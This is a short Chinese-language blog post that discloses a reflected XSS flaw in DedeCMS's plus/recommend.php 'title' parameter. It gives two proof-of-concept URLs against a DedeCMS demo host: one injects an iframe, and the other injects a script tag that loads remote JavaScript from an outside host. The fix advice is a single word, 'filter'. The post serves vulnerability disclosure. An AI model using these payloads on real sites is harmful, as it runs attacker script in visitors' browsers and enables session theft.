Dedecms最新版一处反射型XSS漏洞 – 网站安全 – 自学

时间: 2020-10-11|tag: 34次围观|0 条评论

Dedecms 一处 XSS漏洞,有图就有真相

http://v57.demo.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3Ciframe%20src=//www.baidu.com%3E%3C/iframe%3E

http://v57.demo.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3CSCRIPT%20SRC=//ha.ckers.org/xss.js%3E%3C/SCRIPT%3E
 

Dedecms最新版一处反射型XSS漏洞 – 网站安全 – 自学插图

 

Dedecms最新版一处反射型XSS漏洞 – 网站安全 – 自学插图1

 

修复方案:

过滤!
    上一篇: 新网域名MYDNS解析系统header sql注入 - 网站安全

    下一篇: 某通用型大学校报发布系统注入漏洞 - 网站安全
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《Dedecms最新版一处反射型XSS漏洞 – 网站安全 – 自学
   

还没有人抢沙发呢~